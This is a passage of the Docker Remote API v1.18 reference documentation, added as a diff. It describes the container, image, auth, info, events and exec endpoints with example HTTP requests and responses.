+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Get container stats based on resource usage
+
+`GET /containers/(id or name)/stats`
+
+This endpoint returns a live stream of a container's resource usage statistics.
+
+**Example request**:
+
+    GET /v1.18/containers/redis1/stats HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Type: application/json
+
+      {
+         "read" : "2015-01-08T22:57:31.547920715Z",
+         "network" : {
+            "rx_dropped" : 0,
+            "rx_bytes" : 648,
+            "rx_errors" : 0,
+            "tx_packets" : 8,
+            "tx_dropped" : 0,
+            "rx_packets" : 8,
+            "tx_errors" : 0,
+            "tx_bytes" : 648
+         },
+         "memory_stats" : {
+            "stats" : {
+               "total_pgmajfault" : 0,
+               "cache" : 0,
+               "mapped_file" : 0,
+               "total_inactive_file" : 0,
+               "pgpgout" : 414,
+               "rss" : 6537216,
+               "total_mapped_file" : 0,
+               "writeback" : 0,
+               "unevictable" : 0,
+               "pgpgin" : 477,
+               "total_unevictable" : 0,
+               "pgmajfault" : 0,
+               "total_rss" : 6537216,
+               "total_rss_huge" : 6291456,
+               "total_writeback" : 0,
+               "total_inactive_anon" : 0,
+               "rss_huge" : 6291456,
+               "hierarchical_memory_limit" : 67108864,
+               "total_pgfault" : 964,
+               "total_active_file" : 0,
+               "active_anon" : 6537216,
+               "total_active_anon" : 6537216,
+               "total_pgpgout" : 414,
+               "total_cache" : 0,
+               "inactive_anon" : 0,
+               "active_file" : 0,
+               "pgfault" : 964,
+               "inactive_file" : 0,
+               "total_pgpgin" : 477
+            },
+            "max_usage" : 6651904,
+            "usage" : 6537216,
+            "failcnt" : 0,
+            "limit" : 67108864
+         },
+         "blkio_stats" : {},
+         "cpu_stats" : {
+            "cpu_usage" : {
+               "percpu_usage" : [
+                  16970827,
+                  1839451,
+                  7107380,
+                  10571290
+               ],
+               "usage_in_usermode" : 10000000,
+               "total_usage" : 36488948,
+               "usage_in_kernelmode" : 20000000
+            },
+            "system_cpu_usage" : 20091722000000000,
+            "throttling_data" : {}
+         }
+      }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Resize a container TTY
+
+`POST /containers/(id or name)/resize?h=<height>&w=<width>`
+
+Resize the TTY for container with  `id`. You must restart the container for the resize to take effect.
+
+**Example request**:
+
+      POST /v1.18/containers/4fa6e0f0c678/resize?h=40&w=80 HTTP/1.1
+
+**Example response**:
+
+      HTTP/1.1 200 OK
+      Content-Length: 0
+      Content-Type: text/plain; charset=utf-8
+
+**Query parameters**:
+
+-   **h** – height of `tty` session
+-   **w** – width
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – No such container
+-   **500** – Cannot resize container
+
+#### Start a container
+
+`POST /containers/(id or name)/start`
+
+Start the container `id`
+
+> **Note**:
+> For backwards compatibility, this endpoint accepts a `HostConfig` as JSON-encoded request body.
+> See [create a container](#create-a-container) for details.
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/start HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already started
+-   **404** – no such container
+-   **500** – server error
+
+#### Stop a container
+
+`POST /containers/(id or name)/stop`
+
+Stop the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/stop?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **304** – container already stopped
+-   **404** – no such container
+-   **500** – server error
+
+#### Restart a container
+
+`POST /containers/(id or name)/restart`
+
+Restart the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/restart?t=5 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **t** – number of seconds to wait before killing the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Kill a container
+
+`POST /containers/(id or name)/kill`
+
+Kill the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/kill HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **signal** - Signal to send to the container: integer or string like `SIGINT`.
+        When not set, `SIGKILL` is assumed and the call waits for the container to exit.
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Rename a container
+
+`POST /containers/(id or name)/rename`
+
+Rename the container `id` to a `new_name`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/rename?name=new_name HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **name** – new name for the container
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **409** - conflict name already assigned
+-   **500** – server error
+
+#### Pause a container
+
+`POST /containers/(id or name)/pause`
+
+Pause the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/pause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Unpause a container
+
+`POST /containers/(id or name)/unpause`
+
+Unpause the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/unpause HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Status codes**:
+
+-   **204** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Attach to a container
+
+`POST /containers/(id or name)/attach`
+
+Attach to the container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/16253994b7c4/attach?logs=1&stream=0&stdout=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 101 UPGRADED
+    Content-Type: application/vnd.docker.raw-stream
+    Connection: Upgrade
+    Upgrade: tcp
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **101** – no error, hints proxy about hijacking
+-   **200** – no error, no upgrade header found
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+**Stream details**:
+
+When using the TTY setting is enabled in
+[`POST /containers/create`
+](#create-a-container),
+the stream is the raw data from the process PTY and client's `stdin`.
+When the TTY is disabled, then the stream is multiplexed to separate
+`stdout` and `stderr`.
+
+The format is a **Header** and a **Payload** (frame).
+
+**HEADER**
+
+The header contains the information which the stream writes (`stdout` or
+`stderr`). It also contains the size of the associated frame encoded in the
+last four bytes (`uint32`).
+
+It is encoded on the first eight bytes like this:
+
+    header := [8]byte{STREAM_TYPE, 0, 0, 0, SIZE1, SIZE2, SIZE3, SIZE4}
+
+`STREAM_TYPE` can be:
+
+-   0: `stdin` (is written on `stdout`)
+-   1: `stdout`
+-   2: `stderr`
+
+`SIZE1, SIZE2, SIZE3, SIZE4` are the four bytes of
+the `uint32` size encoded as big endian.
+
+**PAYLOAD**
+
+The payload is the raw stream.
+
+**IMPLEMENTATION**
+
+The simplest way to implement the Attach protocol is the following:
+
+    1.  Read eight bytes.
+    2.  Choose `stdout` or `stderr` depending on the first byte.
+    3.  Extract the frame size from the last four bytes.
+    4.  Read the extracted size and output it on the correct output.
+    5.  Goto 1.
+
+#### Attach to a container (websocket)
+
+`GET /containers/(id or name)/attach/ws`
+
+Attach to the container `id` via websocket
+
+Implements websocket protocol handshake according to [RFC 6455](http://tools.ietf.org/html/rfc6455)
+
+**Example request**
+
+    GET /v1.18/containers/e90e34656806/attach/ws?logs=0&stream=1&stdin=1&stdout=1&stderr=1 HTTP/1.1
+
+**Example response**
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**Query parameters**:
+
+-   **logs** – 1/True/true or 0/False/false, return logs. Default `false`.
+-   **stream** – 1/True/true or 0/False/false, return stream.
+        Default `false`.
+-   **stdin** – 1/True/true or 0/False/false, if `stream=true`, attach
+        to `stdin`. Default `false`.
+-   **stdout** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stdout` log, if `stream=true`, attach to `stdout`. Default `false`.
+-   **stderr** – 1/True/true or 0/False/false, if `logs=true`, return
+        `stderr` log, if `stream=true`, attach to `stderr`. Default `false`.
+
+**Status codes**:
+
+-   **200** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **500** – server error
+
+#### Wait a container
+
+`POST /containers/(id or name)/wait`
+
+Block until container `id` stops, then returns the exit code
+
+**Example request**:
+
+    POST /v1.18/containers/16253994b7c4/wait HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"StatusCode": 0}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Remove a container
+
+`DELETE /containers/(id or name)`
+
+Remove the container `id` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.18/containers/16253994b7c4?v=1 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 204 No Content
+
+**Query parameters**:
+
+-   **v** – 1/True/true or 0/False/false, Remove the volumes
+        associated to the container. Default `false`.
+-   **force** - 1/True/true or 0/False/false, Kill then remove the container.
+        Default `false`.
+
+**Status codes**:
+
+-   **204** – no error
+-   **400** – bad parameter
+-   **404** – no such container
+-   **409** – conflict
+-   **500** – server error
+
+#### Copy files or folders from a container
+
+`POST /containers/(id or name)/copy`
+
+Copy files or folders of container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/4fa6e0f0c678/copy HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Resource": "test.txt"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such container
+-   **500** – server error
+
+### 2.2 Images
+
+#### List Images
+
+`GET /images/json`
+
+**Example request**:
+
+    GET /v1.18/images/json?all=0 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+         "RepoTags": [
+           "ubuntu:12.04",
+           "ubuntu:precise",
+           "ubuntu:latest"
+         ],
+         "Id": "8dbd9e392a964056420e5d58ca5cc376ef18e2de93b5cc90e868a1bbc8318c1c",
+         "Created": 1365714795,
+         "Size": 131506275,
+         "VirtualSize": 131506275
+      },
+      {
+         "RepoTags": [
+           "ubuntu:12.10",
+           "ubuntu:quantal"
+         ],
+         "ParentId": "27cf784147099545",
+         "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+         "Created": 1364102658,
+         "Size": 24653,
+         "VirtualSize": 180116135
+      }
+    ]
+
+**Example request, with digest information**:
+
+    GET /v1.18/images/json?digests=1 HTTP/1.1
+
+**Example response, with digest information**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+      {
+        "Created": 1420064636,
+        "Id": "4986bf8c15363d1c5d15512d5266f8777bfba4974ac56e3270e7760f6f0a8125",
+        "ParentId": "ea13149945cb6b1e746bf28032f02e9b5a793523481a0a18645fc77ad53c4ea2",
+        "RepoDigests": [
+          "localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf"
+        ],
+        "RepoTags": [
+          "localhost:5000/test/busybox:latest",
+          "playdate:latest"
+        ],
+        "Size": 0,
+        "VirtualSize": 2429728
+      }
+    ]
+
+The response shows a single image `Id` associated with two repositories
+(`RepoTags`): `localhost:5000/test/busybox`: and `playdate`. A caller can use
+either of the `RepoTags` values `localhost:5000/test/busybox:latest` or
+`playdate:latest` to reference the image.
+
+You can also use `RepoDigests` values to reference an image. In this response,
+the array has only one reference and that is to the
+`localhost:5000/test/busybox` repository; the `playdate` repository has no
+digest. You can reference this digest using the value:
+`localhost:5000/test/busybox@sha256:cbbf2f9a99b47fc460d...`
+
+See the `docker run` and `docker build` commands for examples of digest and tag
+references on the command line.
+
+**Query parameters**:
+
+-   **all** – 1/True/true or 0/False/false, default false
+-   **filters** – a JSON encoded value of the filters (a map[string][]string) to process on the images list. Available filters:
+  -   `dangling=true`
+  -   `label=key` or `label="key=value"` of an image label
+-   **filter** - only return images with the specified name
+
+#### Build image from a Dockerfile
+
+`POST /build`
+
+Build an image from a Dockerfile
+
+**Example request**:
+
+    POST /v1.18/build HTTP/1.1
+
+    {% raw %}
+    {{ TAR STREAM }}
+    {% endraw %}
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"stream": "Step 1/5..."}
+    {"stream": "..."}
+    {"error": "Error...", "errorDetail": {"code": 123, "message": "Error..."}}
+
+The input stream must be a `tar` archive compressed with one of the
+following algorithms: `identity` (no compression), `gzip`, `bzip2`, `xz`.
+
+The archive must include a build instructions file, typically called
+`Dockerfile` at the archive's root. The `dockerfile` parameter may be
+used to specify a different build instructions file. To do this, its value must be
+the path to the alternate build instructions file to use.
+
+The archive may include any number of other files,
+which are accessible in the build context (See the [*ADD build
+command*](../reference/builder.md#add)).
+
+The Docker daemon performs a preliminary validation of the `Dockerfile` before
+starting the build, and returns an error if the syntax is incorrect. After that,
+each instruction is run one-by-one until the ID of the new image is output.
+
+The build is canceled if the client drops the connection by quitting
+or being killed.
+
+**Query parameters**:
+
+-   **dockerfile** - Path within the build context to the Dockerfile. This is
+        ignored if `remote` is specified and points to an individual filename.
+-   **t** – A name and optional tag to apply to the image in the `name:tag` format.
+        If you omit the `tag` the default `latest` value is assumed.
+-   **remote** – A Git repository URI or HTTP/HTTPS context URI. If the
+        URI points to a single text file, the file's contents are placed into
+        a file called `Dockerfile` and the image is built from that file.
+-   **q** – Suppress verbose build output.
+-   **nocache** – Do not use the cache when building the image.
+-   **pull** - Attempt to pull the image even if an older image exists locally.
+-   **rm** - Remove intermediate containers after a successful build (default behavior).
+-   **forcerm** - Always remove intermediate containers (includes `rm`).
+-   **memory** - Set memory limit for build.
+-   **memswap** - Total memory (memory + swap), `-1` to enable unlimited swap.
+-   **cpushares** - CPU shares (relative weight).
+-   **cpusetcpus** - CPUs in which to allow execution (e.g., `0-3`, `0,1`).
+
+**Request Headers**:
+
+-   **Content-type** – Set to `"application/tar"`.
+-   **X-Registry-Config** – base64-encoded ConfigFile object
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Create an image
+
+`POST /images/create`
+
+Create an image either by pulling it from the registry or by importing it
+
+**Example request**:
+
+    POST /v1.18/images/create?fromImage=busybox&tag=latest HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pulling..."}
+    {"status": "Pulling", "progress": "1 B/ 100 B", "progressDetail": {"current": 1, "total": 100}}
+    {"error": "Invalid..."}
+    ...
+
+When using this endpoint to pull an image from the registry, the
+`X-Registry-Auth` header can be used to include
+a base64-encoded AuthConfig object.
+
+**Query parameters**:
+
+-   **fromImage** – Name of the image to pull.
+-   **fromSrc** – Source to import.  The value may be a URL from which the image
+        can be retrieved or `-` to read the image from the request body.
+-   **repo** – Repository name.
+-   **tag** – Tag. If empty when pulling an image, this causes all tags
+        for the given image to be pulled.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** - repository does not exist or no read access
+-   **500** – server error
+
+
+
+#### Inspect an image
+
+`GET /images/(name)/json`
+
+Return low-level information on the image `name`
+
+**Example request**:
+
+    GET /v1.18/images/ubuntu/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+       "Created": "2013-03-23T22:24:18.818426-07:00",
+       "Container": "3d67245a8d72ecf13f33dffac9f79dcdf70f75acb84d308770391510e0c23ad0",
+       "ContainerConfig": {
+          "Hostname": "",
+          "User": "",
+          "AttachStdin": false,
+          "AttachStdout": false,
+          "AttachStderr": false,
+          "Tty": true,
+          "OpenStdin": true,
+          "StdinOnce": false,
+          "Env": null,
+          "Cmd": ["/bin/bash"],
+          "Dns": null,
+          "Image": "ubuntu",
+          "Labels": {
+             "com.example.vendor": "Acme",
+             "com.example.license": "GPL",
+             "com.example.version": "1.0"
+          },
+          "Volumes": null,
+          "VolumesFrom": "",
+          "WorkingDir": ""
+       },
+       "Id": "b750fe79269d2ec9a3c593ef05b4332b1d1a02a62b4accb2c21d589ff2f5f2dc",
+       "Parent": "27cf784147099545",
+       "Size": 6824592
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Get the history of an image
+
+`GET /images/(name)/history`
+
+Return the history of the image `name`
+
+**Example request**:
+
+    GET /v1.18/images/ubuntu/history HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+        {
+            "Id": "b750fe79269d",
+            "Created": 1364102658,
+            "CreatedBy": "/bin/bash"
+        },
+        {
+            "Id": "27cf78414709",
+            "Created": 1364068391,
+            "CreatedBy": ""
+        }
+    ]
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Push an image on the registry
+
+`POST /images/(name)/push`
+
+Push the image `name` on the registry
+
+**Example request**:
+
+    POST /v1.18/images/test/push HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "Pushing..."}
+    {"status": "Pushing", "progress": "1/? (n/a)", "progressDetail": {"current": 1}}}
+    {"error": "Invalid..."}
+    ...
+
+If you wish to push an image on to a private registry, that image must already have a tag
+into a repository which references that registry `hostname` and `port`.  This repository name should
+then be used in the URL. This duplicates the command line's flow.
+
+**Example request**:
+
+    POST /v1.18/images/registry.acme.com:5000/test/push HTTP/1.1
+
+
+**Query parameters**:
+
+-   **tag** – The tag to associate with the image on the registry. This is optional.
+
+**Request Headers**:
+
+-   **X-Registry-Auth** – base64-encoded AuthConfig object.
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **500** – server error
+
+#### Tag an image into a repository
+
+`POST /images/(name)/tag`
+
+Tag the image `name` into a repository
+
+**Example request**:
+
+    POST /v1.18/images/test/tag?repo=myrepo&force=0&tag=v42 HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+
+**Query parameters**:
+
+-   **repo** – The repository to tag in
+-   **force** – 1/True/true or 0/False/false, default false
+-   **tag** - The new tag name
+
+**Status codes**:
+
+-   **201** – no error
+-   **400** – bad parameter
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Remove an image
+
+`DELETE /images/(name)`
+
+Remove the image `name` from the filesystem
+
+**Example request**:
+
+    DELETE /v1.18/images/test HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-type: application/json
+
+    [
+     {"Untagged": "3e2f21a89f"},
+     {"Deleted": "3e2f21a89f"},
+     {"Deleted": "53b4f83ac9"}
+    ]
+
+**Query parameters**:
+
+-   **force** – 1/True/true or 0/False/false, default false
+-   **noprune** – 1/True/true or 0/False/false, default false
+
+**Status codes**:
+
+-   **200** – no error
+-   **404** – no such image
+-   **409** – conflict
+-   **500** – server error
+
+#### Search images
+
+`GET /images/search`
+
+Search for an image on [Docker Hub](https://hub.docker.com).
+
+> **Note**:
+> The response keys have changed from API v1.6 to reflect the JSON
+> sent by the registry server to the docker daemon's request.
+
+**Example request**:
+
+    GET /v1.18/images/search?term=sshd HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    [
+            {
+                "star_count": 12,
+                "is_official": false,
+                "name": "wma55/u1210sshd",
+                "is_automated": false,
+                "description": ""
+            },
+            {
+                "star_count": 10,
+                "is_official": false,
+                "name": "jdswinbank/sshd",
+                "is_automated": false,
+                "description": ""
+            },
+            {
+                "star_count": 18,
+                "is_official": false,
+                "name": "vgauthier/sshd",
+                "is_automated": false,
+                "description": ""
+            }
+    ...
+    ]
+
+**Query parameters**:
+
+-   **term** – term to search
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+### 2.3 Misc
+
+#### Check auth configuration
+
+`POST /auth`
+
+Get the default username and email
+
+**Example request**:
+
+    POST /v1.18/auth HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "username": "hannibal",
+         "password": "xxxx",
+         "email": "hannibal@a-team.com",
+         "serveraddress": "https://index.docker.io/v1/"
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **204** – no error
+-   **500** – server error
+
+#### Display system-wide information
+
+`GET /info`
+
+Display system-wide information
+
+**Example request**:
+
+    GET /v1.18/info HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+        "Containers": 11,
+        "Debug": 0,
+        "DockerRootDir": "/var/lib/docker",
+        "Driver": "btrfs",
+        "DriverStatus": [[""]],
+        "ExecutionDriver": "native-0.1",
+        "HttpProxy": "http://test:test@localhost:8080",
+        "HttpsProxy": "https://test:test@localhost:8080",
+        "ID": "7TRN:IPZB:QYBB:VPBQ:UMPP:KARE:6ZNR:XE6T:7EWV:PKF4:ZOJD:TPYS",
+        "IPv4Forwarding": 1,
+        "Images": 16,
+        "IndexServerAddress": "https://index.docker.io/v1/",
+        "InitPath": "/usr/bin/docker",
+        "InitSha1": "",
+        "KernelVersion": "3.12.0-1-amd64",
+        "Labels": [
+            "storage=ssd"
+        ],
+        "MemTotal": 2099236864,
+        "MemoryLimit": 1,
+        "NCPU": 1,
+        "NEventsListener": 0,
+        "NFd": 11,
+        "NGoroutines": 21,
+        "Name": "prod-server-42",
+        "NoProxy": "9.81.1.160",
+        "OperatingSystem": "Boot2Docker",
+        "RegistryConfig": {
+            "IndexConfigs": {
+                "docker.io": {
+                    "Mirrors": null,
+                    "Name": "docker.io",
+                    "Official": true,
+                    "Secure": true
+                }
+            },
+            "InsecureRegistryCIDRs": [
+                "127.0.0.0/8"
+            ]
+        },
+        "SwapLimit": 0,
+        "SystemTime": "2015-03-10T11:11:23.730591467-07:00"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Show the docker version information
+
+`GET /version`
+
+Show the docker version information
+
+**Example request**:
+
+    GET /v1.18/version HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {
+         "Version": "1.5.0",
+         "Os": "linux",
+         "KernelVersion": "3.18.5-tinycore64",
+         "GoVersion": "go1.4.1",
+         "GitCommit": "a8a31ef",
+         "Arch": "amd64",
+         "ApiVersion": "1.18"
+    }
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Ping the docker server
+
+`GET /_ping`
+
+Ping the docker server
+
+**Example request**:
+
+    GET /v1.18/_ping HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    OK
+
+**Status codes**:
+
+-   **200** - no error
+-   **500** - server error
+
+#### Create a new image from a container's changes
+
+`POST /commit`
+
+Create a new image from a container's changes
+
+**Example request**:
+
+    POST /v1.18/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1
+    Content-Type: application/json
+
+    {
+         "Hostname": "",
+         "Domainname": "",
+         "User": "",
+         "AttachStdin": false,
+         "AttachStdout": true,
+         "AttachStderr": true,
+         "PortSpecs": null,
+         "Tty": false,
+         "OpenStdin": false,
+         "StdinOnce": false,
+         "Env": null,
+         "Cmd": [
+                 "date"
+         ],
+         "Volumes": {
+                 "/tmp": {}
+         },
+         "WorkingDir": "",
+         "NetworkDisabled": false,
+         "ExposedPorts": {
+                 "22/tcp": {}
+         }
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {"Id": "596069db4bf5"}
+
+**JSON parameters**:
+
+-  **config** - the container's configuration
+
+**Query parameters**:
+
+-   **container** – source container
+-   **repo** – repository
+-   **tag** – tag
+-   **comment** – commit message
+-   **author** – author (e.g., "John Hannibal Smith
+    <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>")
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+-   **500** – server error
+
+#### Monitor Docker's events
+
+`GET /events`
+
+Get container events from docker, in real time via streaming.
+
+Docker containers report the following events:
+
+    create, destroy, die, exec_create, exec_start, export, kill, oom, pause, restart, start, stop, unpause
+
+Docker images report the following events:
+
+    untag, delete
+
+**Example request**:
+
+    GET /v1.18/events?since=1374067924
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/json
+
+    {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924}
+    {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966}
+    {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970}
+
+**Query parameters**:
+
+-   **since** – Timestamp. Show all events created since timestamp and then stream
+-   **until** – Timestamp. Show events created until given timestamp and stop streaming
+-   **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters:
+  -   `container=<string>`; -- container to filter
+  -   `event=<string>`; -- event to filter
+  -   `image=<string>`; -- image to filter
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images in a repository
+
+`GET /images/(name)/get`
+
+Get a tarball containing all images and metadata for the repository specified
+by `name`.
+
+If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image
+(and its parents) are returned. If `name` is an image ID, similarly only that
+image (and its parents) are returned, but with the exclusion of the
+'repositories' file in the tarball, as there were no image names referenced.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.18/images/ubuntu/get
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Get a tarball containing all images
+
+`GET /images/get`
+
+Get a tarball containing all images and metadata for one or more repositories.
+
+For each value of the `names` parameter: if it is a specific name and tag (e.g.
+`ubuntu:latest`), then only that image (and its parents) are returned; if it is
+an image ID, similarly only that image (and its parents) are returned and there
+would be no names referenced in the 'repositories' file for this image ID.
+
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    GET /v1.18/images/get?names=myname%2Fmyapp%3Alatest&names=busybox
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/x-tar
+
+    Binary data stream
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Load a tarball with a set of images and tags into docker
+
+`POST /images/load`
+
+Load a set of images and tags into a Docker repository.
+See the [image tarball format](#image-tarball-format) for more details.
+
+**Example request**
+
+    POST /v1.18/images/load
+    Content-Type: application/x-tar
+
+    Tarball in body
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+
+**Status codes**:
+
+-   **200** – no error
+-   **500** – server error
+
+#### Image tarball format
+
+An image tarball contains one directory per image layer (named using its long ID),
+each containing these files:
+
+- `VERSION`: currently `1.0` - the file format version
+- `json`: detailed layer information, similar to `docker inspect layer_id`
+- `layer.tar`: A tarfile containing the filesystem changes in this layer
+
+The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories
+for storing attribute changes and deletions.
+
+If the tarball defines a repository, the tarball should also include a `repositories` file at
+the root that contains a list of repository and tag names mapped to layer IDs.
+
+```
+{"hello-world":
+    {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"}
+}
+```
+
+#### Exec Create
+
+`POST /containers/(id or name)/exec`
+
+Sets up an exec instance in a running container `id`
+
+**Example request**:
+
+    POST /v1.18/containers/e90e34656806/exec HTTP/1.1
+    Content-Type: application/json
+
+    {
+      "AttachStdin": true,
+      "AttachStdout": true,
+      "AttachStderr": true,
+      "Cmd": ["sh"],
+      "Tty": true
+    }
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: application/json
+
+    {
+         "Id": "f90e34656806",
+         "Warnings":[]
+    }
+
+**JSON parameters**:
+
+-   **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command.
+-   **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command.
+-   **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+-   **Cmd** - Command to run specified as a string or an array of strings.
+
+
+**Status codes**:
+
+-   **201** – no error
+-   **404** – no such container
+
+#### Exec Start
+
+`POST /exec/(id)/start`
+
+Starts a previously set up `exec` instance `id`. If `detach` is true, this API
+returns after starting the `exec` command. Otherwise, this API sets up an
+interactive session with the `exec` command.
+
+**Example request**:
+
+    POST /v1.18/exec/e90e34656806/start HTTP/1.1
+    Content-Type: application/json
+
+    {
+     "Detach": false,
+     "Tty": false
+    }
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: application/vnd.docker.raw-stream
+
+    {% raw %}
+    {{ STREAM }}
+    {% endraw %}
+
+**JSON parameters**:
+
+-   **Detach** - Detach from the `exec` command.
+-   **Tty** - Boolean value to allocate a pseudo-TTY.
+
